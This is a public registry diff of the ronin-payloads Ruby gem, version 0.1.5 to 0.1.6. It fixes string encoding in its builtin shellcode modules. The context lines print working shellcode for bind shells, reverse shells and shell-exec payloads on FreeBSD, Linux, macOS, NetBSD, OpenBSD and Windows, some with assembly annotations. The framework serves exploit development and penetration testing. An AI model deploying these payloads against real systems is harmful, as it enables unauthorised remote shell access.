ronin-payloads 0.1.5 → 0.1.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (30) hide show
  1. checksums.yaml +4 -4
  2. data/.rubocop.yml +3 -0
  3. data/ChangeLog.md +7 -0
  4. data/README.md +1 -0
  5. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
  6. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
  7. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
  8. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
  9. data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
  10. data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
  11. data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
  12. data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
  13. data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
  14. data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
  15. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
  16. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
  17. data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
  18. data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
  19. data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
  20. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
  21. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
  22. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
  23. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
  24. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
  25. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
  26. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
  27. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
  28. data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
  29. data/lib/ronin/payloads/version.rb +1 -1
  30. metadata +2 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 23ed6234ba68bb63d9e7e909987b1b4c3b5f8f75048cb9cef20c61d2a5769bcc
4
- data.tar.gz: de32a35122ac1e6452b3d1a0148fcb0d4089a9fefa951084cc51cd36bd27c98c
3
+ metadata.gz: 97fb8be02023f3bdaf5ef16711bf1192a574ee10b00a46912c964b01e8577012
4
+ data.tar.gz: a3eb94423e154cd03df538b3883f58de6c166dc7ba7a8f6da077f192f9c66b44
5
5
  SHA512:
6
- metadata.gz: b5dfda82e5c0fcda3da9d48093921b5bcc6935460f9a6bc434b0891a60bfb08995526a3b39f540d6515faddcfc6d882d7f3f27cb64107300c1bbc0e575f43c3b
7
- data.tar.gz: 5457d1110e9cd8b544e95cdb890a0d135e6e01b3a4f6b7e3fedacdd84bf9cb12005ee695a6b5b6061d824f3f631c31d75b4a1fd44aabe2f8a343b1cd6fab9c93
6
+ metadata.gz: c4d865c10c583da8a38aea5bb79f39f1165d15dd54e09594a2a557a4880058d7c6bd6f5411f382f9a49386cd2fc36ada45868a7001135ebc742613c9d732a359
7
+ data.tar.gz: 795417f0c54ae31283be366941b1f703f67fc3d7cfae9cd13f634b89323b2119e0389cc433638514296327a93f4efdfdad5d63c6458eb46fdb3a5be8f4a192a6
data/.rubocop.yml CHANGED
@@ -40,3 +40,6 @@ Style/RedundantLineContinuation:
40
40
  Layout/LineContinuationSpacing:
41
41
  Exclude:
42
42
  - 'lib/ronin/payloads/builtin/shellcode/**/*.rb'
43
+ Style/StringConcatenation:
44
+ Exclude:
45
+ - 'lib/ronin/payloads/builtin/shellcode/**/*.rb'
data/ChangeLog.md CHANGED
@@ -1,3 +1,10 @@
1
+ ### 0.1.6 / 2024-07-01
2
+
3
+ #### Payloads
4
+
5
+ * Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
6
+ building shellcode payloads with certain IP addresses or port numbers.
7
+
1
8
  ### 0.1.5 / 2024-06-19
2
9
 
3
10
  * Fixed order of arguments passed to `TCPServer.new` in
data/README.md CHANGED
@@ -213,6 +213,7 @@ $ git push
213
213
  Define a `/bin/sh` shellcode payload:
214
214
 
215
215
  ```ruby
216
+ # encoding: ASCII-8BIT
216
217
  require 'ronin/payloads/shellcode_payload'
217
218
 
218
219
  module Ronin
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
58
59
  "\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
59
60
  "\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
60
61
  "\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
61
- "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23".b
62
+ "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
62
63
  end
63
64
 
64
65
  end
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
53
54
  def build
54
55
  @payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
55
56
  "\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
56
- "\x54\x53\xb0\x3b\x50\xcd\x80".b
57
+ "\x54\x53\xb0\x3b\x50\xcd\x80"
57
58
  end
58
59
 
59
60
  end
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -56,7 +57,7 @@ module Ronin
56
57
  "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
57
58
  "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
58
59
  "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
59
- "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80".b
60
+ "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
60
61
  end
61
62
 
62
63
  end
data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
53
54
  def build
54
55
  @payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
55
56
  "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
56
- "\x54\x5f\x52\x57\x54\x5e\x0f\x05".b
57
+ "\x54\x5f\x52\x57\x54\x5e\x0f\x05"
57
58
  end
58
59
 
59
60
  end
data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -119,7 +120,7 @@ module Ronin
119
120
  "\x08\x00\x8d\xe2" \
120
121
  "\x00\x10\x8d\xe2" \
121
122
  "\x04\x20\x8d\xe2" \
122
- "\x0b\x00\x90\xef".b
123
+ "\x0b\x00\x90\xef"
123
124
  end
124
125
 
125
126
  end
data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xc2\x51\x03\x37" \
61
62
  "\x01\xdf\x2f\x62" \
62
63
  "\x69\x6e\x2f\x2f" \
63
- "\x73\x68".b
64
+ "\x73\x68"
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -72,7 +73,7 @@ module Ronin
72
73
  "#{packed_port}" \
73
74
  "#{packed_ipv4}" \
74
75
  \
75
- "/bin/sh\0".b
76
+ "/bin/sh\0"
76
77
  end
77
78
 
78
79
  end
data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -118,7 +119,7 @@ module Ronin
118
119
  "\xf0\xff\xa5\x23" \
119
120
  "\xab\x0f\x02\x24" \
120
121
  "\x0c\x01\x01\x01" \
121
- "/bin/sh".b
122
+ "/bin/sh"
122
123
  end
123
124
 
124
125
  end
data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,18 +52,18 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x28\x06\xff\xff".b + # slti a2,zero,-1
55
- "\x3c\x0f\x2f\x2f".b + # lui t7,0x2f2f
56
- "\x35\xef\x62\x69".b + # ori t7,t7,0x6269
57
- "\xaf\xaf\xff\xf4".b + # sw t7,-12(sp)
58
- "\x3c\x0e\x6e\x2f".b + # lui t6,0x6e2f
59
- "\x35\xce\x73\x68".b + # ori t6,t6,0x7368
60
- "\xaf\xae\xff\xf8".b + # sw t6,-8(sp)
61
- "\xaf\xa0\xff\xfc".b + # sw zero,-4(sp)
62
- "\x27\xa4\xff\xf4".b + # addiu a0,sp,-12
63
- "\x28\x05\xff\xff".b + # slti a1,zero,-1
64
- "\x24\x02\x0f\xab".b + # li v0,4011
65
- "\x01\x01\x01\x0c".b # syscall 0x40404
55
+ @payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
56
+ "\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
57
+ "\x35\xef\x62\x69" + # ori t7,t7,0x6269
58
+ "\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
59
+ "\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
60
+ "\x35\xce\x73\x68" + # ori t6,t6,0x7368
61
+ "\xaf\xae\xff\xf8" + # sw t6,-8(sp)
62
+ "\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
63
+ "\x27\xa4\xff\xf4" + # addiu a0,sp,-12
64
+ "\x28\x05\xff\xff" + # slti a1,zero,-1
65
+ "\x24\x02\x0f\xab" + # li v0,4011
66
+ "\x01\x01\x01\x0c" # syscall 0x40404
66
67
  end
67
68
 
68
69
  end
data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -100,7 +101,7 @@ module Ronin
100
101
  "\x27\xa4\xff\xf4" \
101
102
  "\x28\x05\xff\xff" \
102
103
  "\x24\x02\x0f\xab" \
103
- "\x01\x01\x01\x0c".b
104
+ "\x01\x01\x01\x0c"
104
105
  end
105
106
 
106
107
  end
data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,20 +52,20 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x7c\x3f\x0b\x78".b + # mr r31,r1
55
- "\x7c\xa5\x2a\x79".b + # xor. r5,r5,r5
56
- "\x42\x40\xff\xf9".b + # bdzl+ 10000454< main>
57
- "\x7f\x08\x02\xa6".b + # mflr r24
58
- "\x3b\x18\x01\x34".b + # addi r24,r24,308
59
- "\x98\xb8\xfe\xfb".b + # stb r5,-261(r24)
60
- "\x38\x78\xfe\xf4".b + # addi r3,r24,-268
61
- "\x90\x61\xff\xf8".b + # stw r3,-8(r1)
62
- "\x38\x81\xff\xf8".b + # addi r4,r1,-8
63
- "\x90\xa1\xff\xfc".b + # stw r5,-4(r1)
64
- "\x3b\xc0\x01\x60".b + # li r30,352
65
- "\x7f\xc0\x2e\x70".b + # srawi r0,r30,5
66
- "\x44\xde\xad\xf2".b + # .long 0x44deadf2
67
- "/bin/shZ".b # the last byte becomes NULL
55
+ @payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
56
+ "\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
57
+ "\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
58
+ "\x7f\x08\x02\xa6" + # mflr r24
59
+ "\x3b\x18\x01\x34" + # addi r24,r24,308
60
+ "\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
61
+ "\x38\x78\xfe\xf4" + # addi r3,r24,-268
62
+ "\x90\x61\xff\xf8" + # stw r3,-8(r1)
63
+ "\x38\x81\xff\xf8" + # addi r4,r1,-8
64
+ "\x90\xa1\xff\xfc" + # stw r5,-4(r1)
65
+ "\x3b\xc0\x01\x60" + # li r30,352
66
+ "\x7f\xc0\x2e\x70" + # srawi r0,r30,5
67
+ "\x44\xde\xad\xf2" + # .long 0x44deadf2
68
+ "/bin/shZ" # the last byte becomes NULL
68
69
  end
69
70
 
70
71
  end
data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -125,7 +126,7 @@ module Ronin
125
126
  "\x3b\xc0\x01\x60" \
126
127
  "\x7f\xc0\x2e\x70" \
127
128
  "\x44\xde\xad\xf2" \
128
- "/bin/shZ".b
129
+ "/bin/shZ"
129
130
  end
130
131
 
131
132
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -98,7 +99,7 @@ module Ronin
98
99
  "\x68\x2f\x62\x69\x6e" \
99
100
  "\x89\xe3" \
100
101
  "\xb0\x0b" \
101
- "\xcd\x80".b
102
+ "\xcd\x80"
102
103
  end
103
104
 
104
105
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -54,7 +55,7 @@ module Ronin
54
55
  def build
55
56
  @payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
56
57
  "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
57
- "\x80".b
58
+ "\x80"
58
59
  end
59
60
 
60
61
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -62,7 +63,7 @@ module Ronin
62
63
  "\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
63
64
  "\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
64
65
  "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
65
- "\x80".b
66
+ "\x80"
66
67
  end
67
68
 
68
69
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -59,7 +60,7 @@ module Ronin
59
60
  "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
60
61
  "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
61
62
  "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
62
- "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05".b
63
+ "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
63
64
  end
64
65
 
65
66
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,16 +52,16 @@ module Ronin
51
52
  # Builds the shellcode.
52
53
  #
53
54
  def build
54
- @payload = "\x48\x31\xd2".b + # xor %rdx, %rdx
55
- "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68".b + # mov $0x68732f6e69622f2f, %rbx
56
- "\x48\xc1\xeb\x08".b + # shr $0x8, %rbx
57
- "\x53".b + # push %rbx
58
- "\x48\x89\xe7".b + # mov %rsp, %rdi
59
- "\x50".b + # push %rax
60
- "\x57".b + # push %rdi
61
- "\x48\x89\xe6".b + # mov %rsp, %rsi
62
- "\xb0\x3b".b + # mov $0x3b, %al
63
- "\x0f\x05".b # syscall
55
+ @payload = "\x48\x31\xd2" + # xor %rdx, %rdx
56
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
57
+ "\x48\xc1\xeb\x08" + # shr $0x8, %rbx
58
+ "\x53" + # push %rbx
59
+ "\x48\x89\xe7" + # mov %rsp, %rdi
60
+ "\x50" + # push %rax
61
+ "\x57" + # push %rdi
62
+ "\x48\x89\xe6" + # mov %rsp, %rsi
63
+ "\xb0\x3b" + # mov $0x3b, %al
64
+ "\x0f\x05" # syscall
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
58
59
  "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
59
60
  "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
60
61
  "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
61
- "\x5f\x6a\x3b\x58\x0f\x05".b
62
+ "\x5f\x6a\x3b\x58\x0f\x05"
62
63
  end
63
64
 
64
65
  end
data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -55,7 +56,7 @@ module Ronin
55
56
  @payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
56
57
  "\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
57
58
  "\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
58
- "\x6e\x2f\x2f\x73\x68".b
59
+ "\x6e\x2f\x2f\x73\x68"
59
60
  end
60
61
 
61
62
  end
data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
61
62
  "\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
62
63
  "\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
63
- "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05".b
64
+ "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -74,7 +75,7 @@ module Ronin
74
75
  "\x01\x01\x01\x01" \
75
76
  "\x02\x02\x02\x02" \
76
77
  "\x03\x03\x03\x03" \
77
- "\x9a\x04\x04\x04\x04\x07\x04".b
78
+ "\x9a\x04\x04\x04\x04\x07\x04"
78
79
  end
79
80
 
80
81
  end
data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
60
61
  "\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
61
62
  "\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
62
63
  "\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
63
- "\x73\x68\x41\x90".b
64
+ "\x73\x68\x41\x90"
64
65
  end
65
66
 
66
67
  end
data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,18 +53,18 @@ module Ronin
52
53
  # Builds the shellcode.
53
54
  #
54
55
  def build
55
- @payload = "\x99".b + # cltd
56
- "\x52".b + # push %edx
57
- "\x68\x6e\x2f\x73\x68".b + # push $0x68732f6e
58
- "\x68\x2f\x2f\x62\x69".b + # push $0x69622f2f
59
- "\x89\xe3".b + # mov %esp,%ebx
60
- "\x52".b + # push %edx
61
- "\x54".b + # push %esp
62
- "\x53".b + # push %ebx
63
- "\x53".b + # push %ebx
64
- "\x6a\x3b".b + # push $0x3b
65
- "\x58".b + # pop %eax
66
- "\xcd\x80".b # int $0x80
56
+ @payload = "\x99" + # cltd
57
+ "\x52" + # push %edx
58
+ "\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
59
+ "\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
60
+ "\x89\xe3" + # mov %esp,%ebx
61
+ "\x52" + # push %edx
62
+ "\x54" + # push %esp
63
+ "\x53" + # push %ebx
64
+ "\x53" + # push %ebx
65
+ "\x6a\x3b" + # push $0x3b
66
+ "\x58" + # pop %eax
67
+ "\xcd\x80" # int $0x80
67
68
  end
68
69
 
69
70
  end
data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb CHANGED
@@ -1,3 +1,4 @@
1
+ # encoding: ASCII-8BIT
1
2
  # frozen_string_literal: true
2
3
  #
3
4
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,26 +53,26 @@ module Ronin
52
53
  # Builds the shellcode.
53
54
  #
54
55
  def build
55
- @payload = "\x31\xC9".b + # xor ecx,ecx
56
- "\x64\x8B\x71\x30".b + # mov esi,[fs:ecx+0x30]
57
- "\x8B\x76\x0C".b + # mov esi,[esi+0xc]
58
- "\x8B\x76\x1C".b + # mov esi,[esi+0x1c]
59
- "\x8B\x36".b + # mov esi,[esi]
60
- "\x8B\x06".b + # mov eax,[esi]
61
- "\x8B\x68\x08".b + # mov ebp,[eax+0x8]
62
- "\xEB\x20".b + # jmp short 0x35
63
- "\x5B".b + # pop ebx
64
- "\x53".b + # push ebx
65
- "\x55".b + # push ebp
66
- "\x5B".b + # pop ebx
67
- "\x81\xEB\x11\x11\x11\x11".b + # sub ebx,0x11111111
68
- "\x81\xC3\xDA\x3F\x1A\x11".b + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
69
- "\xFF\xD3".b + # call ebx
70
- "\x81\xC3\x11\x11\x11\x11".b + # add ebx,0x11111111
71
- "\x81\xEB\x8C\xCC\x18\x11".b + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
72
- "\xFF\xD3".b + # call ebx
73
- "\xE8\xDB\xFF\xFF\xFF".b + # call dword 0x15
74
- "\x63\x6d\x64".b # db "cmd"
56
+ @payload = "\x31\xC9" + # xor ecx,ecx
57
+ "\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
58
+ "\x8B\x76\x0C" + # mov esi,[esi+0xc]
59
+ "\x8B\x76\x1C" + # mov esi,[esi+0x1c]
60
+ "\x8B\x36" + # mov esi,[esi]
61
+ "\x8B\x06" + # mov eax,[esi]
62
+ "\x8B\x68\x08" + # mov ebp,[eax+0x8]
63
+ "\xEB\x20" + # jmp short 0x35
64
+ "\x5B" + # pop ebx
65
+ "\x53" + # push ebx
66
+ "\x55" + # push ebp
67
+ "\x5B" + # pop ebx
68
+ "\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
69
+ "\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
70
+ "\xFF\xD3" + # call ebx
71
+ "\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
72
+ "\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
73
+ "\xFF\xD3" + # call ebx
74
+ "\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
75
+ "\x63\x6d\x64" # db "cmd"
75
76
  end
76
77
 
77
78
  end
data/lib/ronin/payloads/version.rb CHANGED
@@ -22,6 +22,6 @@
22
22
  module Ronin
23
23
  module Payloads
24
24
  # ronin-payloads version
25
- VERSION = '0.1.5'
25
+ VERSION = '0.1.6'
26
26
  end
27
27
  end
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: ronin-payloads
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.5
4
+ version: 0.1.6
5
5
  platform: ruby
6
6
  authors:
7
7
  - Postmodern
8
8
  autorequire:
9
9
  bindir: bin
10
10
  cert_chain: []
11
- date: 2024-06-20 00:00:00.000000000 Z
11
+ date: 2024-07-03 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: ronin-support